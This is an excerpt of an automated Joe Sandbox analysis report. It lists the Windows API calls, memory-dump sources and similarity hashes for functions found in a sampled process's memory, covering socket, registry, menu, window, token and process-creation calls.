WSAGetLastError.WSOCK32(00000000), ref: 00AF68C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AF68F9
connect.WSOCK32(00000000,?,00000010), ref: 00AF6902
WSAGetLastError.WSOCK32 ref: 00AF690C
closesocket.WSOCK32(00000000), ref: 00AF6935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AF694E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: c1409b712568f8ec45f1c2adb030abdd5ed820b74c5ef14d381871395713ab15
Instruction ID: 037d6459cf27c0fa40a6c3b52d669521cb046bd79eddfd46f1d699548ed44fcb
Opcode Fuzzy Hash: c1409b712568f8ec45f1c2adb030abdd5ed820b74c5ef14d381871395713ab15
Instruction Fuzzy Hash: 0031A471600118AFDB10AFA4CC85BBE77B9EB44765F048029FE05AB291DBB4AC458BA1

Function 00ADE360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE3CB
SysAllocString.OLEAUT32(00000000), ref: 00ADE3CE
SysAllocString.OLEAUT32 ref: 00ADE3EF
SysFreeString.OLEAUT32 ref: 00ADE3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00ADE412
SysAllocString.OLEAUT32(?), ref: 00ADE420

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: eb4f22cc112af26d499a10982480fe152190000058a0a9d7080c930168f2cc80
Instruction ID: 45967c014259f426cf56926702c843274e09f68cf6a83e8dc3a4538df22a4488
Opcode Fuzzy Hash: eb4f22cc112af26d499a10982480fe152190000058a0a9d7080c930168f2cc80
Instruction Fuzzy Hash: 06214775604104AFEB50FFA8DC89DAE77ECEB09360B408526F915CF3A0DA75EC818764

Function 00B07BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B07C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B07C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B07C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B07C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B07C8A

Strings

Msctls_Progress32, xrefs: 00B07C28

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 91dd7314a185114b57b8e0d53b28dc9548a87ed4d37e763d47befa2e6490341f
Instruction ID: 61e5ced6a60e8176f22935a1ef49664890ec8008a765679d7bc40547c4cf08c6
Opcode Fuzzy Hash: 91dd7314a185114b57b8e0d53b28dc9548a87ed4d37e763d47befa2e6490341f
Instruction Fuzzy Hash: B91186B1554219BEFF159F60CC85EE7BF5DEF08758F114115BA04A6090CB71AC21DBA4

Function 00AA41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AA4282,?), ref: 00AA41D3
GetProcAddress.KERNEL32(00000000), ref: 00AA41DA
EncodePointer.KERNEL32(00000000), ref: 00AA41E6
DecodePointer.KERNEL32(00000001,00AA4282,?), ref: 00AA4203

Strings

combase.dll, xrefs: 00AA41CE
RoInitialize, xrefs: 00AA41C2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 652f0e9e0c91ab252b9b7e4eb6b6ff16ade4c3aa32b1377f13e9bcf2c4487b77
Instruction ID: 72fd1a0465d303c781fa555d311e7d400cf06c574c0276c7d09ed78a67c5d21b
Opcode Fuzzy Hash: 652f0e9e0c91ab252b9b7e4eb6b6ff16ade4c3aa32b1377f13e9bcf2c4487b77
Instruction Fuzzy Hash: 73E012B4560B41AFDB202B70EC4DB943595B756B06F908524B411E70F0DFF552C88F04

Function 00AA428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AA41A8), ref: 00AA42A8
GetProcAddress.KERNEL32(00000000), ref: 00AA42AF
EncodePointer.KERNEL32(00000000), ref: 00AA42BA
DecodePointer.KERNEL32(00AA41A8), ref: 00AA42D5

Strings

combase.dll, xrefs: 00AA42A3
RoUninitialize, xrefs: 00AA4297

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: b212274c9bfd3351d1fc5c2b3bdf9d18514633ac54085cc5c222b1bfa1228751
Instruction ID: b845de99f921bb5eeee77b6b3462ef7386c22043c87de5c5fecc48b832087863
Opcode Fuzzy Hash: b212274c9bfd3351d1fc5c2b3bdf9d18514633ac54085cc5c222b1bfa1228751
Instruction Fuzzy Hash: 28E0B674560B00BBDB21AB60BD0DBC43AA4BB5AB06F908129F001E74F1DFF447C4CA14

Function 00A8218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00A821B8
GetWindowRect.USER32(?,?), ref: 00A821F9
ScreenToClient.USER32(?,?), ref: 00A82221
GetClientRect.USER32(?,?), ref: 00A82350
GetWindowRect.USER32(?,?), ref: 00A82369

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 2915c6700bad084a1a913d934b988d5fc9fe1072f530376f174007e40f44bfb3
Instruction ID: 387ab62f6d015092b871b3e4e9fb259a027d70e09e0f35d95bac18050302a8cc
Opcode Fuzzy Hash: 2915c6700bad084a1a913d934b988d5fc9fe1072f530376f174007e40f44bfb3
Instruction Fuzzy Hash: 17B18A3991024ADBDF10DFA8C9807FEB7B1FF08310F148129ED59AB255EB70AA50CB64

Function 00AE6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AE6BC6
_memmove.LIBCMT ref: 00AE6B01

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

_memmove.LIBCMT ref: 00AE6B74
_memmove.LIBCMT ref: 00AE6C5B
_memmove.LIBCMT ref: 00AE6C74
_memmove.LIBCMT ref: 00AE6C90

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
Instruction ID: fe5ef885939191d549e2184630452d437aa04394730a4170be6c62479aeca92e
Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
Instruction Fuzzy Hash: F561DE3050069AABCF11FF61CE82EFE37A8AF59388F044959F9596B292DB309D45CB50

Function 00B00844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B00980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B009A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B009EC
RegCloseKey.ADVAPI32(00000000), ref: 00B009F9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: f7365c575c16af5f5fbc9c16ce69712d2c9ed393acebb60cde7b37f8f18367a0
Instruction ID: d41cdd7df34c62ad69f7e4a772a5269117f1e592709555cc55fe739ef412e2c4
Opcode Fuzzy Hash: f7365c575c16af5f5fbc9c16ce69712d2c9ed393acebb60cde7b37f8f18367a0
Instruction Fuzzy Hash: 36517831218205AFD714EF68C985E6EBBE9FF89314F04495DF485872A2EB31E905CB52

Function 00B05DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B05E38
GetMenuItemCount.USER32(00000000), ref: 00B05E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B05E97
GetMenuItemID.USER32(?,?), ref: 00B05F06
GetSubMenu.USER32(?,?), ref: 00B05F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00B05F65

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 69c2ad6bd55c98fef6e81ef56c77e604976c5885cbc7bd86778bacb8d1020904
Instruction ID: 149042c4f544b643ec68af490853258ae1d1179449eda268dd692bd2865f55c6
Opcode Fuzzy Hash: 69c2ad6bd55c98fef6e81ef56c77e604976c5885cbc7bd86778bacb8d1020904
Instruction Fuzzy Hash: EF517035A0161AAFCF21EF64C945AAEBBF5EF48310F104099F905BB391DB74AE418F90

Function 00ADF688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00ADF6A2
VariantClear.OLEAUT32(00000013), ref: 00ADF714
VariantClear.OLEAUT32(00000000), ref: 00ADF76F
_memmove.LIBCMT ref: 00ADF799
VariantClear.OLEAUT32(?), ref: 00ADF7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ADF814

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 129f4210dedb0ca806a7fcc490faf24d748c02d0359cde2ac29662eb358ca25c
Instruction ID: 62dade1475f904526b12f61dd2ea632cf207fde04bed9a58d28ebc3240006fd7
Opcode Fuzzy Hash: 129f4210dedb0ca806a7fcc490faf24d748c02d0359cde2ac29662eb358ca25c
Instruction Fuzzy Hash: B8513E75A00209EFDB14CF58C884AAAB7B8FF4D354B15856AED5ADB304D730E951CF90

Function 00AE29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE29FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2A4A
IsMenu.USER32(00000000), ref: 00AE2A6A
CreatePopupMenu.USER32 ref: 00AE2A9E
GetMenuItemCount.USER32(000000FF), ref: 00AE2AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AE2B2D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: c5b310a49d2e9296afe2638984f6be74a36062b9371c30efaf4c234072052c97
Instruction ID: 5cde94af807bad33392248ba1291aae65e37adbbeba1964e455525bf1204b023
Opcode Fuzzy Hash: c5b310a49d2e9296afe2638984f6be74a36062b9371c30efaf4c234072052c97
Instruction Fuzzy Hash: 7E51F070600389DFDF21CF6AC888BAEBBF9EF54314F144129E8119B2A1E7B09D44CB51

Function 00A81B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00A81B76
GetWindowRect.USER32(?,?), ref: 00A81BDA
ScreenToClient.USER32(?,?), ref: 00A81BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A81C08
EndPaint.USER32(?,?), ref: 00A81C52

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 38fd5b48c16c20b8a3eaf6ef89721fda7748cd088f82df5e227da9408aea7a2b
Instruction ID: 7866d329842e46055627cab028832c592b529016d56057ae1074af2087bf9226
Opcode Fuzzy Hash: 38fd5b48c16c20b8a3eaf6ef89721fda7748cd088f82df5e227da9408aea7a2b
Instruction Fuzzy Hash: D3419E74144204AFD710EF25CC88FBA7BFCFB56360F140669F995872A2CB709946DB61

Function 00AF7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00AF550C,?,?,00000000,00000001), ref: 00AF7796

Part of subcall function 00AF406C: GetWindowRect.USER32(?,?), ref: 00AF407F

GetDesktopWindow.USER32 ref: 00AF77C0
GetWindowRect.USER32(00000000), ref: 00AF77C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00AF77F9

Part of subcall function 00AE57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5877

GetCursorPos.USER32(?), ref: 00AF7825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AF7883

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 212c698b17a3386228d0e0696f7199da42f55fde939e36205538b4ecc5da3980
Instruction ID: bc277347153f81a557d854087b32b4b1847835aeef7455730b769fae90fd811e
Opcode Fuzzy Hash: 212c698b17a3386228d0e0696f7199da42f55fde939e36205538b4ecc5da3980
Instruction Fuzzy Hash: 8C31B272508309ABD720DF54D849FAFB7AAFF88354F004929F58597191CB70E958CBE2

Function 00AD9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AD8CDE
Part of subcall function 00AD8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AD8CE8
Part of subcall function 00AD8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AD8CF7
Part of subcall function 00AD8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AD8CFE
Part of subcall function 00AD8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AD8D14

GetLengthSid.ADVAPI32(?,00000000,00AD904D), ref: 00AD9482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AD948E
HeapAlloc.KERNEL32(00000000), ref: 00AD9495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00AD94AE
GetProcessHeap.KERNEL32(00000000,00000000,00AD904D), ref: 00AD94C2
HeapFree.KERNEL32(00000000), ref: 00AD94C9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 1b9bd21465ea8a8e11ee3e3195bceed40ba834c578613816570eac4598cad47d
Instruction ID: 5f78bd66db3e32afcd41ead27118adcf1ea4b8bee85552c7fbf39792a2db6f09
Opcode Fuzzy Hash: 1b9bd21465ea8a8e11ee3e3195bceed40ba834c578613816570eac4598cad47d
Instruction Fuzzy Hash: 7D11AFB1611604FFDB10AFA4CC09BEF7BA9EB45315F50801AF946A7211CB399941CB60

Function 00AD91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AD9200
OpenProcessToken.ADVAPI32(00000000), ref: 00AD9207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AD9216
CloseHandle.KERNEL32(00000004), ref: 00AD9221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AD9250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00AD9264

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: b7cf7d7a3138d66ec484d88a76a9e0e8d4037813e47eb625264dc43fffbb50a6
Instruction ID: 351572198123ba09d62d7db9ac3e7106e11c91a817fb85ad230d843f5025b344
Opcode Fuzzy Hash: b7cf7d7a3138d66ec484d88a76a9e0e8d4037813e47eb625264dc43fffbb50a6
Instruction Fuzzy Hash: 3F11597250120EABDF019F94ED49FDE7BA9EF09304F048115FE05A2160C7B2DEA0EB60

Function 00ADC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00ADC34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00ADC35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ADC366
ReleaseDC.USER32(00000000,00000000), ref: 00ADC36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ADC385
MulDiv.KERNEL32(000009EC,?,?), ref: 00ADC397

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 95ca15c939626e9ce7fda7f3d78ea5fc7690128bb10ca61b13017a69c97e3d87
Instruction ID: 6d29b1b8929c6781caeace71a443df91fbb1362e334959c6079b37d284e85869
Opcode Fuzzy Hash: 95ca15c939626e9ce7fda7f3d78ea5fc7690128bb10ca61b13017a69c97e3d87
